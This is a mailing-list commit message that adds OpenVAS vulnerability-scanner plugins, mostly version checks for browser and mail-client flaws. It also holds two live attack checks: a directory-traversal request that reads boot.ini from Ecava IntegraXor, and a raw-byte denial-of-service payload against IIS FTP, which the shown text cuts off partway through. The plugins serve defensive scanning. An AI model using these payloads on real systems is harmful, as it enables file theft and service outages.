[Openvas-commits] r9816 - in trunk/openvas-plugins: . scripts

scm-commit@wald.intevation.org scm-commit at wald.intevation.org
Mon Dec 27 09:55:09 CET 2010


Author: chandra
Date: 2010-12-27 09:55:05 +0100 (Mon, 27 Dec 2010)
New Revision: 9816

Added:
   trunk/openvas-plugins/scripts/gb_ecava_integraxor_dir_trav_vuln.nasl
   trunk/openvas-plugins/scripts/gb_google_chrome_mult_vuln_dec10_lin.nasl
   trunk/openvas-plugins/scripts/gb_google_chrome_mult_vuln_dec10_win.nasl
   trunk/openvas-plugins/scripts/gb_mozilla_prdts_mult_vuln_win01_dec10.nasl
   trunk/openvas-plugins/scripts/gb_mozilla_prdts_mult_vuln_win02_dec10.nasl
   trunk/openvas-plugins/scripts/gb_mozilla_prdts_mult_vuln_win_dec10.nasl
   trunk/openvas-plugins/scripts/gb_ms_iis_ftpd_dos_vuln.nasl
   trunk/openvas-plugins/scripts/gb_opera_mult_vuln_win_dec10.nasl
   trunk/openvas-plugins/scripts/gb_phpmyadmin_security_bypass_vuln.nasl
   trunk/openvas-plugins/scripts/gb_solarftp_mult_cmds_dos_vuln.nasl
   trunk/openvas-plugins/scripts/gb_vmware_web_server_dir_trav_vuln_win.nasl
   trunk/openvas-plugins/scripts/gb_wordpress_register_plus_mult_vuln.nasl
Modified:
   trunk/openvas-plugins/ChangeLog
   trunk/openvas-plugins/scripts/gb_awstats_45123.nasl
Log:
Added new plugins

Modified: trunk/openvas-plugins/ChangeLog
===================================================================
--- trunk/openvas-plugins/ChangeLog	2010-12-23 15:24:46 UTC (rev 9815)
+++ trunk/openvas-plugins/ChangeLog	2010-12-27 08:55:05 UTC (rev 9816)
@@ -1,3 +1,22 @@
+2010-12-27  Chandrashekhar B <bchandra at secpod.com>
+
+	* scripts/gb_vmware_web_server_dir_trav_vuln_win.nasl,
+	scripts/gb_google_chrome_mult_vuln_dec10_win.nasl,
+	scripts/gb_ms_iis_ftpd_dos_vuln.nasl,
+	scripts/gb_mozilla_prdts_mult_vuln_win02_dec10.nasl,
+	scripts/gb_ecava_integraxor_dir_trav_vuln.nasl,
+	scripts/gb_opera_mult_vuln_win_dec10.nasl,
+	scripts/gb_mozilla_prdts_mult_vuln_win01_dec10.nasl,
+	scripts/gb_solarftp_mult_cmds_dos_vuln.nasl,
+	scripts/gb_phpmyadmin_security_bypass_vuln.nasl,
+	scripts/gb_google_chrome_mult_vuln_dec10_lin.nasl,
+	scripts/gb_wordpress_register_plus_mult_vuln.nasl,
+	scripts/gb_mozilla_prdts_mult_vuln_win_dec10.nasl:
+	Added new plugins.
+
+	* scripts/gb_awstats_45123.nasl:
+	Updated CVE.
+
 2010-12-23  Veerendra G.G <veerendragg at secpod.com>
 
 	* scripts/gb_ubuntu_USN_1029_1.nasl,

Modified: trunk/openvas-plugins/scripts/gb_awstats_45123.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_awstats_45123.nasl	2010-12-23 15:24:46 UTC (rev 9815)
+++ trunk/openvas-plugins/scripts/gb_awstats_45123.nasl	2010-12-27 08:55:05 UTC (rev 9816)
@@ -27,6 +27,7 @@
 if (description)
 {
  script_id(100925);
+ script_cve_id("CVE-2010-4367", "CVE-2010-4368");
  script_bugtraq_id(45123);
  script_version ("1.0-$Revision$");
 

Added: trunk/openvas-plugins/scripts/gb_ecava_integraxor_dir_trav_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_ecava_integraxor_dir_trav_vuln.nasl	2010-12-23 15:24:46 UTC (rev 9815)
+++ trunk/openvas-plugins/scripts/gb_ecava_integraxor_dir_trav_vuln.nasl	2010-12-27 08:55:05 UTC (rev 9816)
@@ -0,0 +1,92 @@
+##############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_ecava_integraxor_dir_trav_vuln.nasl 12761 2010-12-22 15:18:29 dec $
+#
+# Ecava IntegraXor Directory Traversal Vulnerability
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(801496);
+  script_version("$Revision$: 1.0");
+  script_tag(name:"cvss_base", value:"6.5");
+  script_tag(name:"risk_factor", value:"High");
+  script_name("Ecava IntegraXor Directory Traversal Vulnerability");
+  desc = "
+  Overview: This host is running Ecava IntegraXor and is prone Directory
+  Traversal vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused due to 'open' request, which can be used by an attacker
+  to download files from the disk where the server is installed.
+
+  Impact:
+  Successful exploitation will let the attackers to download files from the
+  disk where the server is installed through directory traversal attacks.
+
+  Impact Level: Application.
+
+  Affected Software:
+  Ecava IntegraXor version 3.6.4000.0 and prior
+
+  Fix: No solution or patch is available as on 22nd December, 2010. Information
+  regarding this issue will be updated once the solution details are available.
+  For updates refer, http://www.ecava.com/index.htm
+
+  References:
+  http://www.exploit-db.com/exploits/15802/ ";
+
+  script_description(desc);
+  script_summary("Check Ecava IntegraXor is vulnerable to Directory Traversal Attack");
+  script_category(ACT_ATTACK);
+  script_copyright("Copyright (C) 2010 Greenbone Networks GmbH");
+  script_family("Web Servers");
+  exit(0);
+}
+
+
+include("http_func.inc");
+include("http_keepalive.inc");
+
+ecavaPort = "7131";
+if(!get_port_state(ecavaPort)){
+  exit(0);
+}
+
+## Send and receive response
+## Create a project, in this 'abc' is project
+sndReq = string("GET /abc/index.html", "\r\n");
+rcvRes = http_keepalive_send_recv(port:ecavaPort, data:sndReq);
+
+## Confirm the application is ECAVA IntegraXor
+if("<title>ECAVA IntegraXor</title>" >< rcvRes )
+{
+  ## Construct exploit string
+  url ="/abc/open?file_name=..\..\..\..\..\..\..\..\..\..\..\boot.ini";
+  sndReq = http_get(item:url, port:ecavaPort);
+  rcvRes = http_keepalive_send_recv(port:ecavaPort, data:sndReq);
+
+  ## check response to confirm vulnerability
+  if("[boot loader]" >< rcvRes && "\WINDOWS" >< rcvRes){
+    security_hole(ecavaPort);
+  }
+}

Added: trunk/openvas-plugins/scripts/gb_google_chrome_mult_vuln_dec10_lin.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_google_chrome_mult_vuln_dec10_lin.nasl	2010-12-23 15:24:46 UTC (rev 9815)
+++ trunk/openvas-plugins/scripts/gb_google_chrome_mult_vuln_dec10_lin.nasl	2010-12-27 08:55:05 UTC (rev 9816)
@@ -0,0 +1,93 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_google_chrome_mult_vuln_dec10_lin.nasl 12756 2010-12-22 12:12:12 dec $
+#
+# Google Chrome multiple vulnerabilities - Dec 10(Linux)
+#
+# Authors:
+# Sooraj KS <kssooraj at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(801668);
+  script_version("$Revision$: 1.0");
+  script_cve_id("CVE-2010-4575", "CVE-2010-4576", "CVE-2010-4577",
+                "CVE-2010-4578");
+  script_tag(name:"cvss_base", value:"9.3");
+  script_tag(name:"risk_factor", value:"Critical");
+  script_name("Google Chrome multiple vulnerabilities - Dec 10(Linux)");
+  desc = "
+  Overview: The host is running Google Chrome and is prone to multiple
+  vulnerabilities.
+
+  Vulnerability Insight:
+  - The ThemeInstalledInfoBarDelegate::Observe function in browser/extensions/
+    theme_installed_infobar_delegate.cc does not properly handle incorrect tab
+    interaction by an extension.
+  - browser/worker_host/message_port_dispatcher.cc does not properly handle
+    certain postMessage calls, which allows remote attackers to cause a denial
+    of service via crafted JavaScript code that creates a web worker.
+  - Out-of-bounds read error in CSS parsing allows remote attackers to cause a
+    denial of service.
+  - Stale pointers in cursor handling allows remote attackers to cause a denial
+    of service.
+
+  Impact:
+  Successful exploitation could allow attackers to cause a denial of service.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  Google Chrome version prior to 8.0.552.224 on Linux
+
+  Fix: Upgrade to the Google Chrome 8.0.552.224 or later,
+  For updates refer, http://www.google.com/chrome
+
+  References:
+  http://code.google.com/p/chromium/issues/detail?id=60761
+  http://code.google.com/p/chromium/issues/detail?id=63529
+  http://code.google.com/p/chromium/issues/detail?id=63866
+  http://code.google.com/p/chromium/issues/detail?id=64959
+  http://googlechromereleases.blogspot.com/2010/12/stable-beta-channel-updates_13.html
+  ";
+
+  script_description(desc);
+  script_copyright("Copyright (c) 2010 Greenbone Networks GmbH");
+  script_summary("Check the version of Google Chrome");
+  script_category(ACT_GATHER_INFO);
+  script_family("General");
+  script_dependencies("gb_google_chrome_detect_lin.nasl");
+  script_require_keys("Google-Chrome/Linux/Ver");
+  exit(0);
+}
+
+
+include("version_func.inc");
+
+## Get the version from KB
+chromeVer = get_kb_item("Google-Chrome/Linux/Ver");
+if(!chromeVer){
+  exit(0);
+}
+
+## Check for Google Chrome Version less than 8.0.552.224
+if(version_is_less(version:chromeVer, test_version:"8.0.552.224")){
+  security_hole(0);
+}

Added: trunk/openvas-plugins/scripts/gb_google_chrome_mult_vuln_dec10_win.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_google_chrome_mult_vuln_dec10_win.nasl	2010-12-23 15:24:46 UTC (rev 9815)
+++ trunk/openvas-plugins/scripts/gb_google_chrome_mult_vuln_dec10_win.nasl	2010-12-27 08:55:05 UTC (rev 9816)
@@ -0,0 +1,93 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_google_chrome_mult_vuln_dec10_win.nasl 12756 2010-12-22 12:12:12 dec $
+#
+# Google Chrome multiple vulnerabilities - Dec 10(Windows)
+#
+# Authors:
+# Sooraj KS <kssooraj at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(801667);
+  script_version("$Revision$: 1.0");
+  script_cve_id("CVE-2010-4575", "CVE-2010-4576", "CVE-2010-4577",
+                "CVE-2010-4578");
+  script_tag(name:"cvss_base", value:"9.3");
+  script_tag(name:"risk_factor", value:"Critical");
+  script_name("Google Chrome multiple vulnerabilities - Dec 10(Windows)");
+  desc = "
+  Overview: The host is running Google Chrome and is prone to multiple
+  vulnerabilities.
+
+  Vulnerability Insight:
+  - The ThemeInstalledInfoBarDelegate::Observe function in browser/extensions/
+    theme_installed_infobar_delegate.cc does not properly handle incorrect tab
+    interaction by an extension.
+  - browser/worker_host/message_port_dispatcher.cc does not properly handle
+    certain postMessage calls, which allows remote attackers to cause a denial
+    of service via crafted JavaScript code that creates a web worker.
+  - Out-of-bounds read error in CSS parsing allows remote attackers to cause a
+    denial of service.
+  - Stale pointers in cursor handling allows remote attackers to cause a denial
+    of service.
+
+  Impact:
+  Successful exploitation could allow attackers to cause a denial of service.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  Google Chrome version prior to 8.0.552.224 on Windows
+
+  Fix: Upgrade to the Google Chrome 8.0.552.224 or later,
+  For updates refer, http://www.google.com/chrome
+
+  References:
+  http://code.google.com/p/chromium/issues/detail?id=60761
+  http://code.google.com/p/chromium/issues/detail?id=63529
+  http://code.google.com/p/chromium/issues/detail?id=63866
+  http://code.google.com/p/chromium/issues/detail?id=64959
+  http://googlechromereleases.blogspot.com/2010/12/stable-beta-channel-updates_13.html
+  ";
+
+  script_description(desc);
+  script_copyright("Copyright (c) 2010 Greenbone Networks GmbH");
+  script_summary("Check the version of Google Chrome");
+  script_category(ACT_GATHER_INFO);
+  script_family("General");
+  script_dependencies("gb_google_chrome_detect_win.nasl");
+  script_require_keys("GoogleChrome/Win/Ver");
+  exit(0);
+}
+
+
+include("version_func.inc");
+
+## Get the version from KB
+chromeVer = get_kb_item("GoogleChrome/Win/Ver");
+if(!chromeVer){
+  exit(0);
+}
+
+## Check for Google Chrome Version less than 8.0.552.224
+if(version_is_less(version:chromeVer, test_version:"8.0.552.224")){
+  security_hole(0);
+}

Added: trunk/openvas-plugins/scripts/gb_mozilla_prdts_mult_vuln_win01_dec10.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_mozilla_prdts_mult_vuln_win01_dec10.nasl	2010-12-23 15:24:46 UTC (rev 9815)
+++ trunk/openvas-plugins/scripts/gb_mozilla_prdts_mult_vuln_win01_dec10.nasl	2010-12-27 08:55:05 UTC (rev 9816)
@@ -0,0 +1,117 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_mozilla_prdts_mult_vuln_win01_dec10.nasl 12594 2010-12-23 14:15:33Z dec $
+#
+# Mozilla Products Multiple Vulnerabilities dec-10 (Windows)
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(801498);
+  script_version("$Revision$: 1.0");
+  script_cve_id("CVE-2010-3766", "CVE-2010-3767", "CVE-2010-3770", "CVE-2010-3771",
+                "CVE-2010-3773", "CVE-2010-3772", "CVE-2010-3774", "CVE-2010-3775");
+  script_tag(name:"cvss_base", value:"9.3");
+  script_tag(name:"risk_factor", value:"Critical");
+  script_name("Mozilla Products Multiple Vulnerabilities dec-10 (Windows)");
+  desc = "
+  Overview:
+  The host is installed with Mozilla Firefox/Seamonkey that are
+  prone to multiple vulnerabilities.
+
+  Vulnerability Insight:
+  The flaws are due to:
+  - Use-after-free vulnerability.
+  - Integer overflow in the NewIdArray function.
+  - Cross-site Scripting (XSS) vulnerabilities in the rendering engine allows
+    remote attackers to inject arbitrary web script.
+  - Not properly handle injection of an 'ISINDEX' element into an
+    about:blank page.
+  - Error in 'XMLHttpRequestSpy' module in the 'Firebug' add-on is used,
+    does not properly handle interaction between the 'XMLHttpRequestSpy' object
+    and chrome privileged objects.
+  - Not properly calculate index values for certain child content in a 'XUL'
+    tree.
+  - Error in 'NS_SecurityCompareURIs' function in netwerk/base/public/nsNetUtil.h
+    which does not properly handle 'about:neterror' and 'about:certerror' pages.
+  - Not properly handle certain redirections involving 'data: URLs' and
+    'Java LiveConnect' scripts, which allows remote attackers to start processes.
+
+  Impact:
+  Successful exploitation will let attackers to execute arbitrary code.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  Seamonkey version before 2.0.11
+  Firefox version before 3.5.16 and 3.6.x before 3.6.13
+
+  Fix:
+  Upgrade to Firefox version 3.5.16 or 3.6.13 or later
+  http://www.mozilla.com/en-US/firefox/all.html
+
+  Upgrade to Seamonkey version 2.0.11 or later
+  http://www.seamonkey-project.org/releases/
+
+  References:
+  http://www.mozilla.org/security/announce/2010/mfsa2010-80.html
+  http://www.mozilla.org/security/announce/2010/mfsa2010-81.html
+  http://www.mozilla.org/security/announce/2010/mfsa2010-84.html
+  http://www.mozilla.org/security/announce/2010/mfsa2010-76.html ";
+
+  script_description(desc);
+  script_summary("Check for the version of Mozilla Products");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2010 Greenbone Networks GmbH");
+  script_family("General");
+  script_dependencies("gb_firefox_detect_win.nasl", "gb_seamonkey_detect_win.nasl");
+  script_require_keys("Firefox/Win/Ver", "Seamonkey/Win/Ver");
+  exit(0);
+}
+
+
+include("version_func.inc");
+
+## Firefox Check
+ffVer = get_kb_item("Firefox/Win/Ver");
+if(ffVer)
+{
+  ## Grep for Firefox version < 3.5.16, 3.6.x < 3.6.13
+  if(version_in_range(version:ffVer, test_version:"3.6", test_version2:"3.6.13") ||
+     version_is_less(version:ffVer, test_version:"3.5.16"))
+     {
+       security_hole(0);
+       exit(0);
+     }
+}
+
+## Seamonkey Check
+smVer = get_kb_item("Seamonkey/Win/Ver");
+if(smVer != NULL)
+{
+  ## Grep for Seamonkey version 2.0.11
+  if(version_is_less(version:smVer, test_version:"2.0.11"))
+  {
+    security_hole(0);
+    exit(0);
+  }
+}


Property changes on: trunk/openvas-plugins/scripts/gb_mozilla_prdts_mult_vuln_win01_dec10.nasl
___________________________________________________________________
Name: svn:executable
   + *

Added: trunk/openvas-plugins/scripts/gb_mozilla_prdts_mult_vuln_win02_dec10.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_mozilla_prdts_mult_vuln_win02_dec10.nasl	2010-12-23 15:24:46 UTC (rev 9815)
+++ trunk/openvas-plugins/scripts/gb_mozilla_prdts_mult_vuln_win02_dec10.nasl	2010-12-27 08:55:05 UTC (rev 9816)
@@ -0,0 +1,99 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_mozilla_prdts_mult_vuln_win02_dec10.nasl 12594 2010-12-23 15:15:33Z dec $
+#
+# Mozilla Products Multiple Vulnerabilities dec-10 (Windows)
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(801499);
+  script_version("$Revision$: 1.0");
+  script_cve_id("CVE-2010-3777");
+  script_tag(name:"cvss_base", value:"9.3");
+  script_tag(name:"risk_factor", value:"Critical");
+  script_name("Mozilla Products Multiple Vulnerabilities dec-10 (Windows)");
+  desc = "
+  Overview:
+  The host is installed with Mozilla Firefox/Thunderbird that are
+  prone to multiple vulnerabilities.
+
+  Vulnerability Insight:
+  The flaw is caused due to unspecified vulnerability which allows remote
+  attackers to cause a denial of service.
+
+  Impact:
+  Successful exploitation will allows remote attackers to cause a denial of
+  service or possibly execute arbitrary code via unknown vectors.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  Thunderbird version 3.1.x before 3.1.7
+  Firefox version before 3.5.16 and 3.6.x before 3.6.13
+
+  Fix:
+  Upgrade to Firefox version 3.5.16 or 3.6.13 or later
+  http://www.mozilla.com/en-US/firefox/all.html
+
+  Upgrade to Thunderbird version 3.1.7 or later
+  http://www.mozillamessaging.com/en-US/thunderbird/
+
+  References:
+  http://www.mozilla.org/security/announce/2010/mfsa2010-74.html ";
+
+  script_description(desc);
+  script_summary("Check for the version of Mozilla Products");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2010 Greenbone Networks GmbH");
+  script_family("General");
+  script_dependencies("gb_firefox_detect_win.nasl", "gb_thunderbird_detect_win.nasl");
+  script_require_keys("Firefox/Win/Ver", "Thunderbird/Win/Ver");
+  exit(0);
+}
+
+
+include("version_func.inc");
+
+## Firefox Check
+ffVer = get_kb_item("Firefox/Win/Ver");
+if(ffVer)
+{
+  ## Grep for Firefox version < 3.5.16, 3.6.x < 3.6.13
+  if(version_in_range(version:ffVer, test_version:"3.6", test_version2:"3.6.13") ||
+     version_is_less(version:ffVer, test_version:"3.5.16"))
+     {
+       security_hole(0);
+       exit(0);
+     }
+}
+
+## Thunderbird Check
+tbVer = get_kb_item("Thunderbird/Win/Ver");
+if(tbVer != NULL)
+{
+  ## Grep for Thunderbird version 3.1.x < 3.1.7
+  if(version_in_range(version:tbVer, test_version:"3.1", test_version2:"3.1.7")){
+    security_hole(0);
+  }
+}
+


Property changes on: trunk/openvas-plugins/scripts/gb_mozilla_prdts_mult_vuln_win02_dec10.nasl
___________________________________________________________________
Name: svn:executable
   + *

Added: trunk/openvas-plugins/scripts/gb_mozilla_prdts_mult_vuln_win_dec10.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_mozilla_prdts_mult_vuln_win_dec10.nasl	2010-12-23 15:24:46 UTC (rev 9815)
+++ trunk/openvas-plugins/scripts/gb_mozilla_prdts_mult_vuln_win_dec10.nasl	2010-12-27 08:55:05 UTC (rev 9816)
@@ -0,0 +1,126 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_mozilla_prdts_mult_vuln_win_dec10.nasl 12594 2010-12-23 13:15:33Z dec $
+#
+# Mozilla Products Multiple Vulnerabilities dec-10 (Windows)
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(801497);
+  script_version("$Revision$: 1.0");
+  script_cve_id("CVE-2010-3769", "CVE-2010-3768", "CVE-2010-3776");
+  script_tag(name:"cvss_base", value:"9.3");
+  script_tag(name:"risk_factor", value:"Critical");
+  script_name("Mozilla Products Multiple Vulnerabilities dec-10 (Windows)");
+  desc = "
+  Overview:
+  The host is installed with Mozilla Firefox/Seamonkey/Thunderbird that are
+  prone to multiple vulnerabilities.
+
+  Vulnerability Insight:
+  The flaws are due to:
+  - Multiple unspecified vulnerabilities in the browser engine, which allows
+    attackers to cause a denial of service.
+  - 'Line-breaking' implementation which does not properly handle long strings
+    which allow remote attackers to execute arbitrary code via a crafted
+    'document.write' call.
+  - Not properly validate downloadable fonts before use within an operating
+    system's font implementation.
+
+  Impact:
+  Successful exploitation will let attackers to cause a denial of service and
+  execute arbitrary code.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  Seamonkey version before 2.0.11
+  Firefox version before 3.5.16 and 3.6.x before 3.6.13
+  Thunderbird version before 3.0.11 and 3.1.x before 3.1.7
+
+  Fix:
+  Upgrade to Firefox version 3.5.16 or 3.6.13 or later
+  http://www.mozilla.com/en-US/firefox/all.html
+
+  Upgrade to Seamonkey version 2.0.11 or later
+  http://www.seamonkey-project.org/releases/
+
+  Upgrade to Thunderbird version 3.0.11 or 3.1.7 or later
+  http://www.mozillamessaging.com/en-US/thunderbird/
+
+  References:
+  https://bugzilla.redhat.com/show_bug.cgi?id=660420
+  https://bugzilla.mozilla.org/show_bug.cgi?id=527276
+  http://www.mozilla.org/security/announce/2010/mfsa2010-74.html
+  http://www.mozilla.org/security/announce/2010/mfsa2010-75.html
+  http://www.mozilla.org/security/announce/2010/mfsa2010-78.html ";
+
+  script_description(desc);
+  script_summary("Check for the version of Mozilla Products");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2010 Greenbone Networks GmbH");
+  script_family("General");
+  script_dependencies("gb_firefox_detect_win.nasl", "gb_seamonkey_detect_win.nasl",
+                      "gb_thunderbird_detect_win.nasl");
+  script_require_keys("Firefox/Win/Ver", "Seamonkey/Win/Ver", "Thunderbird/Win/Ver");
+  exit(0);
+}
+
+
+include("version_func.inc");
+
+## Firefox Check
+ffVer = get_kb_item("Firefox/Win/Ver");
+if(ffVer)
+{
+  ## Grep for Firefox version < 3.5.16, 3.6.x < 3.6.13
+  if(version_in_range(version:ffVer, test_version:"3.6", test_version2:"3.6.13") ||
+     version_is_less(version:ffVer, test_version:"3.5.16"))
+     {
+       security_hole(0);
+       exit(0);
+     }
+}
+
+## Seamonkey Check
+smVer = get_kb_item("Seamonkey/Win/Ver");
+if(smVer != NULL)
+{
+  ## Grep for Seamonkey version 2.0.11
+  if(version_is_less(version:smVer, test_version:"2.0.11"))
+  {
+    security_hole(0);
+    exit(0);
+  }
+}
+
+## Thunderbird Check
+tbVer = get_kb_item("Thunderbird/Win/Ver");
+if(tbVer != NULL)
+{
+  ## Grep for Thunderbird version < 3.0.11, 3.1.x < 3.1.7
+  if(version_in_range(version:tbVer, test_version:"3.1", test_version2:"3.1.7") ||
+     version_is_less(version:tbVer, test_version:"3.0.11")){
+    security_hole(0);
+  }
+}


Property changes on: trunk/openvas-plugins/scripts/gb_mozilla_prdts_mult_vuln_win_dec10.nasl
___________________________________________________________________
Name: svn:executable
   + *

Added: trunk/openvas-plugins/scripts/gb_ms_iis_ftpd_dos_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_ms_iis_ftpd_dos_vuln.nasl	2010-12-23 15:24:46 UTC (rev 9815)
+++ trunk/openvas-plugins/scripts/gb_ms_iis_ftpd_dos_vuln.nasl	2010-12-27 08:55:05 UTC (rev 9816)
@@ -0,0 +1,714 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_ms_iis_ftpd_dos_vuln.nasl 12762 2010-12-22 15:15:15Z dec $
+#
+# Microsoft Windows IIS FTP Server DOS Vulnerability
+#
+# Authors:
+# Sooraj KS <kssooraj at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(801669);
+  script_version("$Revision$: 1.0");
+  script_tag(name:"cvss_base", value:"6.8");
+  script_tag(name:"risk_factor", value:"High");
+  script_cve_id("CVE-2010-3972");
+  script_name("Microsoft Windows IIS FTP Server DOS Vulnerability");
+  desc = "
+  Overview: This host is running Microsoft IIS with FTP server and is prone to
+  Denial of service vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused due to improper bounds checking when processing certain
+  requests.
+
+  Impact:
+  Successful exploitation may allow remote attackers to execute arbitrary code
+  on the system or cause the application to crash.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  Windows 7 IIS 7.5 FTP Server
+
+  Fix: No solution or patch is available as on 22nd December 2010. Information
+  regarding this issue will be updated once the solution details are available.
+  For updates refer, http://www.iis.net/download/FTP
+
+  References:
+  http://www.exploit-db.com/exploits/15803/
+  ";
+
+  script_description(desc);
+  script_summary("Determine IIS FTP Server DOS Vulnerability");
+  script_category(ACT_DENIAL);
+  script_copyright("Copyright (C) 2010 Greenbone Networks GmbH");
+  script_family("Denial of Service");
+  script_dependencies("find_service.nes");
+  script_require_ports("Services/ftp", 21);
+  exit(0);
+}
+
+
+include("ftp_func.inc");
+
+## Get FTP Port
+ftpPort = get_kb_item("Services/ftp");
+if(!ftpPort){
+  ftpPort = 21;
+}
+
+## Get Port Status
+if(!get_port_state(ftpPort)){
+  exit(0);
+}
+
+## Confirm Application
+banner = get_ftp_banner(port:ftpPort);
+if("Microsoft FTP Service" >!< banner){
+  exit(0);
+}
+
+## Build Exploit
+attack = raw_string(
+0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
+0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
+0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
+0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
+0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
+0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
